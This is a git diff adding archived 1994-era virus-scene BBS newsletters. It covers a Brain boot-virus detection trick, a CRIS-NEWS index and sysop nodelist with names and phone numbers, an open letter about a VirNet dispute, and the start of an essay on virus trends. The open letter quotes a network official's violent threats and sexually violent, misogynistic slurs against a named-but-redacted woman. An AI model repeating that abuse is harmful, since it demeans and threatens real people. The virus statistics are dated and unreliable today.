+3. Since the Brain examines the fifth and sixth bytes for its signature, + change those bytes to the virus' signature, 1234. Below is an altered + first line of a boot sector: + + EB 34 90 49 34 12 20 20 33 2E 32 00 02 02 01 00 + ----- + +Place this altered test disk in drive B and after the system prompt, A>, +type: DIR B: to obtain a directory of the test disk. If the system is infected +by the Brain virus, the following message will appear on the screen: + + Not ready, error reading Drive B Abort, Retry, Ignore? + +The disk with the altered boot sector will work only on a non-infected system. + +***************************************************************************** +The Alvi brothers, Basit and Amjad, sell compatible PCs in their store in +Lebore, Pakistan. When contacted by a reporter for "The Chronicle of Higher +Education," the 19-year old Basit Alvi admitted writing the virus and placing +it on a disk in 1986 "for fun." He reportedly gave a copy of the virus prog- +ram to a friend, another student. However, both brothers were at a loss in +explaining how the virus emigrated to the States. +***************************************************************************** + + +Final Notes: +------------ + +Thanks to Midnight Cowboy for writing those articles and showing interest in +the newsletter. Sorry I did not include them but I came to the conclusion +that there is not much use for batch file virii when there are languages such +as C and Assembly. I do appreciate the effort, though. + +Someone was SUPPOSED to write me a article for the Sample Source Code Dept. +on Pascal virii, but they never did it for me, just wanted to say thanks to +that person. + +I got some bad feedback on my last issue of Viriisearch, and needless to say +I didn't like it too much. This person didn't like the fact that I had gone +over the C source code to ATTRB as much as I did. Well, I decided to go over +the source code really well because ATTRB is a well written program, as well +as a simple program, so I figured it would make you non C programmers inter- +ested in C and for you beginner C programmers, it would make you into a better +C programmer. What I covered on ATTRB last issue took me quite a while to +learn on my own and the knowledge is there for the taking. If you didn't like +it because you didn't understand it, I suggest you start learning C or Assem- +bly because that is, most likely, the only programming languages you will find +in this newsletter. And what does an attributes program have to do with virii? +Well, a lot of virii do have to change attributes on files and there was a +very well written, tight program to do it, in the last issue. + +Speaking of feedback, the more the better. Starting in the next issue, #4, I +will be featuring reader's feedback, which I will reply to. Provided I get +enough feedback. + +I hope you enjoyed this issue of "Viriisearch" The newsletter dedicated +entirely to computer virii. + + +Until Next Time......Be Careful!!! + + * Criminal Minded * +----------------------------------------------------------------------------- diff --git a/textfiles.com/virus/cnws2000.vir b/textfiles.com/virus/cnws2000.vir new file mode 100644 index 00000000..a568ede1 --- /dev/null +++ b/textfiles.com/virus/cnws2000.vir @@ -0,0 +1,263 @@ + + + + + + + + Computer Virus Research and Information Service + (708) 863-5285 + CRIS-NEWS + + I N D E X + + Volume 1, Issue 2, May 1994 + + ************************************ + S T A N D A R D D I S C L A I M E R + ************************************ + + Crisnews will not be held responsible for the articles in this + or any other issue. Crisnews is meant as a place to voice your + views, opinions or feelings. The person writing the article will + have to check the info enclosed in it FOR ACCURACY AND TRUTH. + (of course we will reserve the right to edit out anything that we + find to be crude or overly offensive). The Authors of the articles + will alone, bear the responsiblty for what they write. + + The major goal of Crisnews is to let others out there voice + there opinions and views. Any person that wants to submit an article + may freely express there ideas. We will ask that you keep out any + kind of harsh remarks towards another, or "going out for blood" in + any way towards any person, group, or organization. + + ALL REBUTTALS AND NETMAIL, CONCERNING ARTICLES, OR THE CRISNEWS, WILL + BE INCLUDED IN AN OPEN SECTION IN THE CRISNEWS CALLED "COMMENTS + AND REBUTTALS" IN ALL FUTURE ISSUES. + + IF YOU DO NOT WANT YOUR COMMENTS INCLUDED IN THIS SECTION, YOU + MUST STATE THIS CLEARLY IN YOUR MESSAGE. + + ALL OPINIONS EXPRESSED HERE IN THIS NEWSLETTER ARE SOLELY THOSE + OF THE AUTHORS, AND NOT NESSARILY THOSE OF THE CRIS STAFF. + + + Articles/Topics +------------------------------------------------------------------------------- +000. This Article: The Index +------------------------------------------------------------------------------- +001. V I R N E T U S A - T h e F a c t s - By Michael Paris + As I Know Them First Hand From A Virnet Hierarchy +------------------------------------------------------------------------------- +002. The Virus Threat (c) Ian Douglas 1993 +------------------------------------------------------------------------------- +003. This is an attempt to explain some of the terminology used in + connection with viruses. By: Childe Roland - Cris South Africa +------------------------------------------------------------------------------- +004. Robert Slade Anti-Virus Contact List +------------------------------------------------------------------------------- +005. The V.I.R.U.S./Virus Doctor BBS List +------------------------------------------------------------------------------- +006. [Echoes of Conspiracy] - By FireCracker Part #1 +------------------------------------------------------------------------------- +007. [Echoes of Conspiracy] - By Michael Paris Part #2 + The Facts About Aristotle And His Friends, Things I have Seen and heard + and The things He Told Me. By: Michael Paris C.R.I.S +------------------------------------------------------------------------------- +008. Collection of Cris Info on new viruses researched CrisInfo 1 - 13 +------------------------------------------------------------------------------- +USERSIG.DAT Copy to your TBAV directory and type TBGENSIG {enter} +If you have a registered ver. This will add new signatures of new viruses. +------------------------------------------------------------------------------- + +*************************************************************************** +*************************************************************************** + +;---------------------------------------------------------------------------- +; CRiS Nodelist +Zone,77,CRiSNet_WHQ,Illinois_USA,Michael_Paris,1-708-863-5285,9600,CM,V32B,V42,XA, +; +; 119 SOUTH AFRICA HOST +Host,119,South_Africa_119_Host,South_Africa,Radix,27-11-953-5414,9600,CM,HST,XA,XX +,792,Mirrored_Trap_BBS,South_Africa,Raist_Majere,27-11-792-8878,9600,CM,V32B,V42B,XA,XX +,849,Telephone_Hogger,South_Africa,Richard_Parsons,27-11-849-7172,9600,CM,XA,V32B +,864,The_Secret_Passage,South_Africa,Shadow_Stalker,27-11-864-5787,9600,CM,V32B,V42B,XA,XX +,882,The_Hell's_Cafeteria,South_Africa,Radioactive_Rat,27-11-864-5787,9600,CM +,883,Total_Chaos,South_Africa,Logic,27-11-882-5314,9600,CM,V32B,V42B,XA,XX +,884,The_Lair_,South_Africa,Grey_Wolf,27-27-11-884-7945,9600,V32B,V42B,XA, +,953,Virus_Polytethnic,South_Africa,Childe_Roland,27-11-953-5414,9600,CM,HST,XA,XX +; +; 125 FRANCE HOST +Host,125,The_Lys_Valley_(Help_FD),Comines,Gerard_Manning,33-20631262,9600,CM,XA,V32B,V42B,H16,UNEC,REC +; +; 203 CONNETICUT HOST +Host,203,CT_203_Host,Norwich_CT,Robert_Szarka,1-203-886-1441,9600,CM,V32B,V42,XA +,445,Info_Net_BBS,Groton_CT,John_Luce,1-203-445-0607,9600,CM,V32B,V42,HST,XA +,886,CT_203_Host,Norwich_CT,Robert_Szarka,1-203-886-1441,9600,CM,V32B,V42,XA +,447,Imajica_BBS,New_London_CT,Larry_Hinkley,1-203-447-9372,9600,CM,V32B,V42,XA +; +; 206 WASHINGTON HOST +Host,206,WA_206_Host,Longview_WA,Jeanne_Lejon,1-206-577-7358,9600,CM,HST,V32B,V42,XA +; +; 210 SOUTH TEXAS HOST +Host,210,TX_210_Host,South_Texas,Adapa_Anu,1-210-540-3907,9600,CM,V32B,V42B,XA +; +; 300 AUSTRALIAN Host +Host,300,Australian_300_Host,Kallangur_Qld,Rod_Fewster,61-7-886-1886,9600,V32b,V42b,MNP,CM,XX +,1,Thunderbyte_Australia,Kallangur_Qld,Rod_Fewster,61-7-886-1886,9600,V32b,V42b,MNP,CM,XX +,2,Fractured_Programming_[NuKE]_Oz_HQ,Melbourne_Vic,Screaming_Radish,xx-x-xxx-xxxx,9600,V32b,CM,XX +; +; 305 FLORIDA HOST +Host,305,FL_305_Host,Coconut_Creek_FL,Bruce_Kniffen,1-305-975-5540,9600,V32B,V42B,CM,XA,V42,UNSMH +,351,Onyx_BBS,Fort_Lauderdale_FL,Tyler_Burns,1-305-351-5559,9600,V32B,V42B,CM,XA,V42,HST +,755,Jungle,Coral_Springs_FL,Chris_Geroy,1-305-746-0096,9600,V32B,V42B,CM,XA,V42,HST +,975,Star*Bank,Coconut_Creek_FL,Bruce_Kniffen,1-305-975-5540,9600,V32B,V42B,CM,XA,V42,UNSMH +,977,Deafie_BBS,Fort_Lauderdale_Florida,Steve_Brother,1-305-977-4265,V32B,V42B,CM,XA +; +; 312 ILLINOIS HOST +Host,312,IL_312_Host,Chicago_IL,Zeryis,1-312-622-3313,9600,CM,V32B,V42,XA +,237,The_Coliseum,Chicago_IL,Matthew_Swajkowski,1-312-237-2773,9600,CM,V42B,V32B,XA +,238,The_Game_Room,Chicago_IL,Rafal_Rusilowicz,1-312-237-XXXX,9600,CM,V42B,V32B,XA +,622,Ragnarok_BBS,Chicago_IL,Zeryis,1-312-622-3313,9600,CM,V32B,V42,XA +; +; 403 ALBERTA CANADA HOST +Host,403,Canada_403_Host,Alberta_Canada,Hans_Peterson,1-403-293-5659,9600,V32B,V42B,CM,XX,V42 +; +; 405 OKLAHOMA HOST +Host,405,Oklahoma_405_Host,Lawton_OK,Bill_Dirks,1-405-248-0528,9600,CM,V32B,V32B,XA +,721,Filthy_Habits,Oklahoma_City,John_Schlichting,1-405-721-8513,9600,CM,V32B,V42B,XA +; +; +; 406 MISSOULA MT HOST +Host,406,Missoula_MT_Host,Missoula_MT,Troy_Dowding,1-406-543-4978,9600,CM,V32B,V42B,XA +; +; 418 CANADA HOST COXAL CARMA +Host,418,Quebec_PQ_Host,Quebec_Canada,Martin_Rosa,1-418-878-5177,9600,CM,V32B,V42B,XA +; +; 443 MARTIN ROSELER GERMANY +Host,443,Germany_443_Host,Germany,Martin_Roseler,49-89-92793-593,9600,V32B,V42B,CM,XA +; +; 505 ALASKA HOST +Host,505,AK_505_Host,Alaska,Tiphoid_Mary,1-505-662-0659,9600,CM,V32B,V42,HST,XA +,662,Cypherspace,Alaska,Tiphoid_Mary,1-505-662-0659,9600,CM,V32B,V42,XX +; +; 517 LANSING MICHIGAN HOST +Host,517,MI_517_Host,Lansing_MI,Ender_Wiggins,1-517-485-6647,9600,CM,V32B,V42,XA +; +; 603 NEW HAMPSHIRE HOST +Host,603,NH_603_Host,New_Hampshire,Bill_Clark,1-603-279-9028,9600,V32B,V42,XA +,279,The_Hobby_Center,New_Hampshire,Bill_Clark,1-603-279-9028,9600,V32B,V42,XA +; +; 619 SAN DIEGO HOST +Host,619,SD_CA_619_Host,San_Diego_CA,Gary_Boutwell,1-619-278-5469,9600,CM,V32B,V42B,XA +,1,GCG_Programming,San_Diego_CA,George_Boutwell,1-619-278-5469,9600,CM,V32B,V42B,XA +,2,Toads_Place,Chula_Vista_CA,Bruce_Calvert,1-619-498-1146,9600,CM,V32B,V42B,XA +,3,Alabaster's_Cove_][,La_Mesa_CA,Brian_Schafrik,1-619-463-7230,9600,CM,V32B,V42B,XA +; +; 708 ILLINOIS HOST +Host,708,IL_708_Host,Cicero_IL,Michael_Paris,1-708-863-5285,9600,CM,V32B,V42,XA +,345,S.M.S_Services,Melrose_Park_IL,Steveoramma,1-708-345-1335,9600,CM,V32B,V42,XA +,358,Destructive_Lunacy,Boston_MA,NEC_Ken_Murray,1-708-358-8117,9600,CM,V32B,V42,HST,XA,TAG +,394,The_Rockhouse_Crew_BBS,Arlington Heights,Chris_Aseltine,1-708-394-5058,9600,CM,V32B,V42B,XA +,474,The_Lost_BBS,Chicago_IL,Ice_Nine,1-312-474-0710,9600,CM,V32B,V42,XA,TAG +,475,The_Lost_BBS,Chicago_IL,Ice_Nine,1-312-474-0711,9600,CM,V32B,V42,ZYX,XA +,485,Gramcracker,Brookfield_IL,Handcuffs,1-708-485-7261,9600,CM,HST,V32B,V42,XA +,489,Random_Access,Midlothian_IL,Pete_Frank,1-708-489-1542,9600,CM,V32B,V42,XA +,671,The_Half_Shekel,Schiller_Park,Efrayim_Neumann,1-708-671-9263,9600,V32B,V42B,XA,CM +,743,Programers_Cafe,Chicago_IL,Odin,1-312-274-5366,9600,CM,V32B,V42,HST,XA +,677,Warpspeed,Skokie_Il,Alex_Gen,1-708-677-6824,9600,V32B,V42B,CM +,863,CRiS_BBS,Cicero_IL,Michael_Paris,1-708-863-5285,9600,CM,V32B,V42,XA +,832,Mega_Motel,Elmhurst,Jim_O'Sullivan,1-708-832-2760,9600,CM,V42B,V32B,XA +,910,Embodyment_of_Souls,Woodridge,Jia_Shen,1-708-910-0642,9600,CM,V42B,V32B,XA +; +; 714 CALIFORNIA HOST +Host,714,CA_714_Host,Anaheim_CA,Falcon,1-714-772-7039,9600,CM,V32B,V42,XA +,772,West_Coast_Institute_of_Virus_Research,Anaheim_CA,Falcon,1-714-772-7039,9600,CM,V32B,V42,XA +; +; NEWPORT NEWS VA HOST +Host,790,VA_790_Host,Newport_News_VA,Firecracker,1-804-790-1329,9600,CM,XA +; +; 803 SC HOST +Host,803,SC_773_Host,Sumter_SC,Todd_Greene,1-803-773-9953,9600,CM,V32B,V42B,XA +; +; 804 VIRGINIA HOST +Host,804,VA_804_Host,Norfolk_VA,Roy_Ayres,1-804-461-2250,9600,CM,HST,V32B,V42,XA +; +; 815 ILLINOIS HOST +Host,815,IL_815_Host,Crystal_Lake_IL,Professor_X,1-815-455-2423,9600,CM,V32B,V42,XA +,455,File_Store_BBS,Crystal_Lake_IL,Professor_X,1-815-455-2423,9600,CM,V32B,V42,XA +; +; 816 HOST +Host,816,IL_816_Host,Golden_Country,Michael_McCabe/Brent_Hamm,1-816-455-2423,9600,CM,V32B,V42,XA +; +; +; 9041 PENSACOLA FLORIDA HOST +Host,9041,Pensacola_Host,Pensacola_Florida,Tony_Pittarese,1-904-494-6782,9600,CM,V42B,V32B,XA +,150,The_Haven_of_Rest,Pensacola_FL,John_Calvin_Hall,1-904-474-0992,9600,CM,XB,V32B,V42B +; +; +; 904 FLORIDA HOST +Host,904,FL_904_Host,Eglin_AFB,Alan_Jackson,1-904-729-2110,9600,CM,XA,V32b,V42B +,729,Digital_Underground,Eglin_AFB_FL,Alan_Jackson,1-904-729-2110,9600,CM,XA,V32B,V42B +; +; 919 Goldsborot NC HOST +Host,919,Goldsboro_NC_Host,Goldsborot_NC,Mike_Whatley,1-919-751-2324,9600,CM,XX,V32,V42,H16 +,111,Software Cache,Goldsboro_NC,Dave_Walden,1-919-736-0513,9600,CM,V32B,V42B,XA +; +Zone,76,CRiSNet_WHQ,Illinois_USA,Michael_Paris,1-708-863-5285,9600,CM,V32B,V42,XA, +; 519 WINDSOR ONTARIO HOST +Host,5190,CA_519_Host,Windsor_Ontario_CA,Art_Mason,1-519-972-6828,9600,V32B,V42B + + + *************************************************************************** + * CRiS Virus Bases * + *************************************************************************** + CV_BETA CRiS Virus Beta Testing Base. + In this base researchers and programmers + can talk about virus problems, and how they + are solved. or anything to do with brick walls + they run into. It also serves as A Virus Signature + Alert with the newest virus signatures that you can + add to your scanner. + + MEMCRIS CRiS Members Base + This base is for CRiS research members + but it is a good learning tool to see what + is being researched, and what the outcomes were. + + CV_SEARCH Virus Search + Researchers looking for viruses are posted + here. If another user has the virus they can + find a way to get the file to each other. + UUENCODE supported area. + + CV_CHAT Chat With Mr. Virus + This echo is for anyone, less experienced users + can express their views and thoughts of any virus + manner. But watch out Mr. Virus might put his + two pennies in there + + C_VINEVP CRiS Private Sysop + For CRIS-NET Sysops ONLY! + + *************************************************************************** + Michael Paris World Headquarters of: + Computer Virus Research & Information Service (C.R.I.S) + 1:115/863 (FiDONet) + 77:708/0 (CRiSNet) + crisadm@netcom.com + *************************************************************************** + +*************************************************************************** + Cris will be turning this news letter into a full time thing. + We will be looking for reporters to bring in the scoops.. if you are + interested give us a call. +*************************************************************************** + + C.R.I.S + WANTS YOUR + V I R U S C O L L E C T I O N + Also Any New Viruses That Do Not Scan! + + Cris Has Thousands of Virus and Virus Utilities + On-Line To Serve Your Research Needs diff --git a/textfiles.com/virus/cnws2001.vir b/textfiles.com/virus/cnws2001.vir new file mode 100644 index 00000000..bb1c4b40 --- /dev/null +++ b/textfiles.com/virus/cnws2001.vir @@ -0,0 +1,523 @@ + V I R N E T U S A + T h e F a c t s + + As I Know Them First Hand From A Virnet Hierarchy + By Michael Paris. + C.R.I.S (Computer Research & Information Service) + 04/29/94 + + + +Part #1 Ethics +---------------- + +First I must say that it pains me to write this. I have had +nothing but respect for virnet and the people I have know in it. +But with certain info I have become aware of I feel it is my duty +as a part of the human race to make these facts known. + +I will separate this info into two parts, The first being the +morality of virnet hierarchies and the second in being facts on +their hidden background checks they have done on some of their +members. + +To start with I have turned in my node address for virnet for the +reasons you will see in this open letter, I do not care to continue +to receive the virnet echo anymore and feel that there is some +things you should be made aware of. + +1. A quick look through the virnet nodelist will tell you that +there are many people connected to this echo. Why? (Not sure to +tell you the truth). It seems that for the topic of viruses there +is not much said. I have wasted space on my drive and time polling +and sorting through the mail for a few announcements of files and +welcomes, no real info, just some meaningless messages on +percentages of echo feeds etc. + +This has changed a bit here in the US when they added the "movies" +echo, but this is not what I was looking for, if I wanted to talk +about movies I would get it from fido or usenet mail. + +2. The hierarchies of the net seem not to know much about viruses. +I will say that the people I have talked to do not even know what +a virus is! (no fun here) this is true. Log on to your favorite +virnet hub or node (even the hierarchies systems) ask them what +polymorphic, spawning, stealth, etc, is and they will not know. +(this of course is not all systems, but I will guarantee that it is +the most of them, and definitely the hierarchies in virnet). + +3. Lies, deceit, and morals. It seems that from the people I have +talked to they are no different from the people they talk against. +Most people know about their friend John, This man was accused of +being vulgar to the extremes, he is shunned for speaking very +obscene about female members of virnet, as well as his aditude that +just shows he is unbalanced in the mind. + +Well it seems I have found the same here in the virnet hierarchies, +talking to the people I have made me sick to my stomach and +reminded me of the talks I had with such unbalanced people as I did +before. It made me sick to see the hate expressed and the way it +came out. Talking compleatly about another topic would always +bring us back to the slander and foul language I did not want to +take part in. As for the lies and deceit we will get into that a +bit more in this letter. But as I have witnessed the hierarchies +would tell me one thing (I know was truth) and cover the facts to +the person it was about to avoid public embarrassment. + + +Below you will find an actual conversation between me and A person +in the virnet hierarchy. THIS IS -NOT- A NODE OR HUB speaking for +virnet, it is someone in the hierarchy of virnet in a decision +making level! + +[Narrator] + +The names were taken out to protect the guilty! + +This starts where this virnet hierarchy is talking about tring to +totaly get rid of an ex-virnet member that was found out to be a +nuke member getting the virnet echos. It makes me think why all the +bull shit seeing there is nothing really in the net to protect in +the first place but here is goes. + +[Virnet Hierarchy] + +"and now all we need to do is get rid of ahh, [nukemember], or I +don't know I guess i'm gona have to get a few good minds together +and create some kind of document to finally put this to a final +statement ehhm" + +[Cris Staff Member] "well the biggest thing she has right know but she +does not have any proof of," + +[Virnet Hierarchy] + +"Uh hu" + +[Cris Staff Member] + +"is when you told here about the credit and legal check that was +done on her, She does not have any proof of it but" + +[Narrator] + +Cris Staff Member was interrupted + +[Virnet Hierarchy] + +"I told her my dick was twelve inches long she didn't talk about +that!" + +[Cris Staff Member] + +"I don't think that would matter much" + +[Virnet Hierarchy] + +"why wouldn't that, ya she's so fat it wouldn't even phase her, 320 +lbs. this girl is, I'd have to have a dick that was like god damm +A baseball bat." + +[Cris Staff Member] "ok we won't get into that" + +[Narrator] + +So the Cris Staff Member does not want to hear this garbage, Mr. +Virnet hierarchy goes on to talk about a previous Virnet hierarchy +that he was told was just as bad as this nuke member, because he +was told that virnet messages or files were being passed to the +virus groups through that person. Then he admits here and many +other times in this talk that he would rather join Crisnet and +leave virnet. + +It might seem like a great prize to get someone with this position +into Cris but, we take pride in having 'honest' and 'sincere' non +slandering people in Cris. Every person I have talked to on this +matter that knows him has got the same impression of him and it +would not help Cris in the long run. He offered to bring more then +half of virnet with him into Cris, but again it would not be worth +it in the long run. (one bad apple theory) + +[Virnet Hierarchy] + +"I heard that [old virnet hierarchy] was filtering virnet stuff to +nukenet." + +[Cris Staff Member] + +"ya," + +[Virnet Hierarchy] + +"so now, you know, I mean, what's true, what's false, that's why I +would rather then there being such distinct lines I would rather go +in the middle with someone like you." + +"what I would love to do is leave my wife, turn out to be just, a +bum, and so I can go, and knock some sense into all of these that +are sitting back causing heck, AND PUT A COUPLE BULLETS IN THEIR +BRAINS! MAKE THEM SUFFER FIRST THOUGH! Because this is just to much +bullshit! Did you read the initial letter I wrote to [NukeMember]?" + + +"I've just been praying for someone to come over here or call, I +put my number out there, I am praying for all of these TUFF, BAD, +LILY WHITE MOTHER FUCKERS TO COME OVER HERE!" + +"I would LOVE, to see them come over here!" + +[Narrator] + +Some time passed by and they get on the topic of that nuke member +again, The Virnet Hierarchy thinks that the Cris staff member is +going to spill the beans and will not fully admit to him about a +certain matter. So he continues... + +[Virnet Hierarchy] + +"how do i tell you that this is a virnet policy situation among +hosts, consequently, it would be against policy for me to go taking +things any further with anyone but a host or higher, how does that +sound?" + +[Cris Staff Member] + +"ok, last time when we talked you had shared with me that you had +resources available and that you HAD done a background and legal +check on [nukemember]" + +[Virnet Hierarchy] + +"It really doesn't matt...ok number one it really does not effect +Cris Admin, ok, it really doesn't matter what we are doing! If I +was getting ready to get on a plane to fly out there and blow here +brains out does it matter?" + +[Cris Staff Member] + +"that would" + +[Virnet Hierarchy] + +"would you tell her?" + +[Cris Staff Member] + +"ya" + +[Virnet Hierarchy] + +"so with that in mind, why should I say anything? your showing +partiality to her!" + +[Cris Staff Member] + +"A persons life is a whole other story, for someone to fly out to +blow someone's brains out, that person would be short in the head +or something, so that is a whole different scenario" + +[Virnet Hierarchy] + +"Well she needs somebody to, [pause] she needs to sit in jail and +have some BIG BLACK WOMAN, [pause] STICK A BROOM HANDLE UP HER +CUNT!" [pause] "and hopefully the broom handle will have slivers, +maybe it will excite her! BIG FAT GREASY BITCH!" + + +[Narrator] + +This is all going to far at this point, the slander against someone +he hardly knows and his vulgar tongue is working overtime, now he +goes on to defend the issue of looking into peoples personal +background. (meaning credit and legal checks) + +[Virnet Hierarchy] + +"Does it matter if I said I was going to hire an investigator to do +checks on every person in virnet?" + +[Cris Staff Member] + +"well, you should not have told her though, you should have never +said anything to her" + +[Virnet Hierarchy] + +"it's right in the papers, that four people, BEFORE SHE JOINED, +THAT DIRTY UGLY SLUT SHOULD LEARN HOW TO READ! its right in the +papers that four people will have access to your information, the +REC, the applications coordinator, Mr. Michael Larson, and she put +up such a bitch about him having information on her, and if need +be, and INVESTIGATOR! [pause] IT SAY'S THAT IN THE PAPER WORK!" + +[Cris Staff Member] + +"hum" + +[Virnet Hierarchy] + +"what ever she does in life, if she gets stopped for a traffic +violation, the whores going to get stopped and checked for +everything that she's ever done!" + + +[Narrator] + +This goes on, and there is much more slander about named virus +writers, virus writers in general, groups, etc. But this is here +so you can understand why I feel that virnet has it's problems and +I want no part in it. + + + +Part #2 Virnet Background Checks +--------------------------------- + +Next lets touch the area of background checks. Did you know that +this [Virnet Hierarchy] believes that they (if they feel the need) +believe they can check you out in ANY WAY they want? + +This includes LEGAL, CREDIT, PERSONAL, ETC... this virnet hierarchy +told me that it has always been done this way. People did not know +it, but the previous hierarchies did this as well. THIS WAS TOLD ME +BY THIS VIRNET HIERARCHY! + +They feel that the words in the application that you fill out where +it says about your info on the application, that "if need be, and +investigator" will see it, means that they can find a private +investigator or friend of their's to look into your LEGAL and +PERSONAL background and DIG UP any info they can find on you! + +This hierarchy feels that there is no forgiveness or excuses for +mistakes, if you have a bad credit background it shows you are +"unstable" and not fit for the net! If you were an X-Convict and +paid your debt to society, you will do it again and could be a bad +egg in the net, so you should not be allowed in the net! + +[Narrator] + +So what we will see here is where the common fact of him telling me +that he had someone do these checks on this virnet node is not +disputed, but rather EVERY TIME I bring it up he changes the +subject until it comes to the point where after hours I confront +him and corner him on the issue and he spills the beans. + +[Cris Staff Member] + +"I guess the main thing she was talking about was the virnet checks, +you know that they checked into her credit" + +[Narrator] ---> Interrupted by Virnet Hierarchy and changes the +topic. + +[Virnet Hierarchy] + +"I will not divulge information on my life, whether I am getting +along with my wife or not, or whether my penis is shriveled up or +not.." + +[Narrator] + +So he goes on and on to keep away from the issue. + +[Cris staff Member] + +"Well you did do a check on her right? " + +[Virnet Hierarchy] + +"huh?" + +[Cris Staff Member] + +"I remember you telling me about this" + +[Narrator] ----> Interrupted again and changes the topic. + +[Virnet Hierarchy] + +"Hold on a minute I am reading a letter" + +[Narrator] ----> after a few minutes of reading he never comes back +to answer. + +[Cris Staff Member] + +"well the biggest thing she has right know but she does not have any +proof of," + +[Virnet Hierarchy] + +"Uh hu" + +[Cris Staff Member] + +"is when you told here about the credit and legal check that was +done on her, She does not have any proof of it but" + +[Narrator] + +Cris Staff Member interrupted + +[Virnet Hierarchy] + +"I told her my dick was twelve inches long she didn't talk about +that!" + +[Cris Staff Member] + +"I don't think that would matter much" + +[Virnet Hierarchy] + +"why wouldn't that, ya she's so fat it wouldn't even phase her, 320 +lbs. this girl is, I'd have to have a dick that was like god damm +A baseball bat." + +[Narrator] + +So we see once again he changes the topic! + +[Cris staff Member] + +"Well the main thing she's got is the fact of the legal and +background checks, but she does not have any proof at all, there is +nothing in writing that she can pull up, just that one instance of +you informing her that it was done on her." + +[Narrator] + +Again this goes on, no comment on what was said, just A change of +topic. This goes on many times, at least 12 other times where he +evades the issue until he is cornered on it! + +[Virnet Hierarchy] + +"Does it matter if I said I was going to hire an investigator to do +checks on every person in virnet?" + +[Cris Staff Member] + +"well, you should not have told here though, you should have never +said anything to her" + +[Virnet Hierarchy] + +"it's right in the papers, that four people, BEFORE SHE JOINED, +THAT DIRTY UGLY SLUT SHOULD LEARN HOW TO READ! its right in the +papers that four people will have access to your information, the +REC, the applications coordinator, Mr. Michael Larson, and she put +up such a bitch about him having information on her, and if need be, +and INVESTIGATOR! [pause] IT SAY'S THAT IN THE PAPER WORK!" + +[Cris Staff Member] + +"hum" + +[Virnet Hierarchy] + +"what ever she does in life, if she gets stopped for a traffic +violation, the whores going to get stopped and checked for +everything that she's ever done! + +[Cris Staff Member] + +"I have to be honest with you here ... I see mail nets as a hobby, +I would not want a net to be looking into my legal and credit +information. I am sure you feel the same way!" + +[Virnet Hierarchy] + +"Your ABSOLUTELY wrong!" + +[Cris Staff Member] + +"Tell me why I am wrong" + +[Virnet Hierarchy] + +"Everything we do in life, everything we do we get checked! When you +go for a job, you get checked, you sign a paper, maybe you haven't +but I have signed many of papers that said [changes idea] No matter +what you do, if you drive, no matter what you do in life, driving +can be a hobby, but your going to get checked! " + +"Let me give you a beautiful example, she better not ever go to LA. +california, they send police officers on the street, and they just +stop people at will, and they run a check on them!" + +[Cris Staff Member] + +"But we are talking about a net here, ok you feel this way because +it's an anti-virus net or if it was any net?" + +[Virnet Hierarchy] + +"ANY NET! A N Y N E T!, when you join an organization they have +every right to check up on you because you are becoming part of a +team. and maybe there is someone that don't want as part of that +team." + +[Cris Staff Member] + +"Well I know there is allot of people that may have claimed a +bankruptcy in their past, or maybe they are an x-convict, they +spent time for a certain crime, but they paid their dept to +society. So if that shows up they are going to be kicked out of the +net? What virnet does it it's own business, I don't want to argue, +but" [interrupted] + +[Virnet Hierarchy] + +"She was offered to resign! did she resign? she makes it look like +she quit the virnet! in fact all hells going to break loose when I +resign, I'm going to resign. Everybody's going down!" + +[Narrator] + +This still goes on quite a bit, talking about many different topics +such as law, how you should not make mistakes and if you do you +should go to jail for them, how viruses should be against the law +and people that write them should be locked up, many virus writers +are mentioned and slandered, but then on the topic of prostitutes, +they are ok! and other law breakers are not as bad as virus +writers. I told him that I resign my node number for virnet, and +he asked me to please wait until this all blows over, but I could +not wait for this all to come out in the open, so I just left my +node number with him. + +Also I have a number of hole cards ready to come out on Mr. Virnet +Hierarchy in case the same kind of slander comes this way. + +Here is A post that also shows support in this issue: + +* Original Area:NETMAIL +* Original From: David Schepper (1:114/150) +* Original To : Pam Trexler (1:15/20) + + > I would be interested to know how this turns out for + > you and Steve. Virnet + > is a great disappointment to me all the way round. + +Well, I got a call from Mr. Nuemann (spelling?) last night, and we spent about +two hours on the phone, during which time he told me things about you (the +same things that you had already told me), and we got into a discussion about +having virus writers in the net. I told him that, yes, there should be SOME +screening, but that the net would be better served if they had at least SOME +opposing information allowed access, but he disagreed. I might have been +willing to stay in the net, had he not basically confirmed your statements +about background checks. He said that they DO hire Private Investigators to +look into the backgrounds of "questionable" people. At that point, I told him +that I believed that they had overstepped the bounds of ANY network, and that +what they are doing may indeed be illegal. I also told him that my privacy and +integrity were MUCH more important to me than ANY net, and could no longer +afford to be associated with their net. + +Anyway, to make a long story short, I am no longer associated with VirNet, and +their communistic approach to what is STILL basically a hobby. + + Dave + + +C.R.I.S (Computer Research & Information Service) + diff --git a/textfiles.com/virus/cnws2002.vir b/textfiles.com/virus/cnws2002.vir new file mode 100644 index 00000000..ac552807 --- /dev/null +++ b/textfiles.com/virus/cnws2002.vir @@ -0,0 +1,59 @@ +CrisNews #2 - 05/01/94 + +Reprinted With Permission +By: Cris Research Staff + + + The Virus Threat + (c) Ian Douglas 1993 + +Has the threat from viruses started to decline? The number of viruses for the +IBM PC (Intel x86) platform grows daily, but various events are making the IBM +environment safer. (Experts predict around 4000 - 6000 DOS viruses by the end +of 1994.) + +Chief amongst these is the move away from DOS to new operating systems. The +trend started with Windows (not really an operating system), and has +accelerated with the advent of a reliable OS/2. Further down the line, there +is Windows NT and UNIX. These environments are very unfriendly for the 3000+ +DOS-based viruses. There is a joke that Windows is a good virus detector - if +a Windows file gets infected by a DOS virus, it crashes :-) + +There are two known viruses that can infect Windows executables, but none at +present that can infect OS/2 executables. No known DOS viruses can run under +native OS/2, but only in a DOS session. Also, the constant upgrades to DOS +itself prevent some viruses from working altogether. + +There are three main areas of virus spread: Large businesses, educational +institutions, and swopping disks among friends. Many large business are moving +to OS/2, others will move to Windows NT. In both cases, they are cutting out +an important vector of virus spread. I foresee that educational institutions +will also move to these new operating systems in the near future. The market +will demand students trained in them. This will once again cut out a major +vector for virus spreading. + +That leaves the average user, still running DOS. His has less chance of +getting a virus, since the two main vectors are being cut out. The most common +viruses are boot sector infectors, like Stoned. While these may be able to +infect a machine running OS/2, they will not spread from such a machine. + +The other interesting development has been in the underground. In the race to +create the super-duper type viruses, they have been trying to write complex +viruses. These take longer to write and are usually more buggy. Thus they make +fewer viruses. In order to brag, they publish the viruses in electronic +magazines, and make them available for download on virus exchange BBS's. This +means that they end up in the hands of anti-virus authors, before they have +had a chance to spread widely. Thus the AV authors soon include detection, and +the virus does not spread very much. + +Many virus exchange BBS's have mostly junk (virus 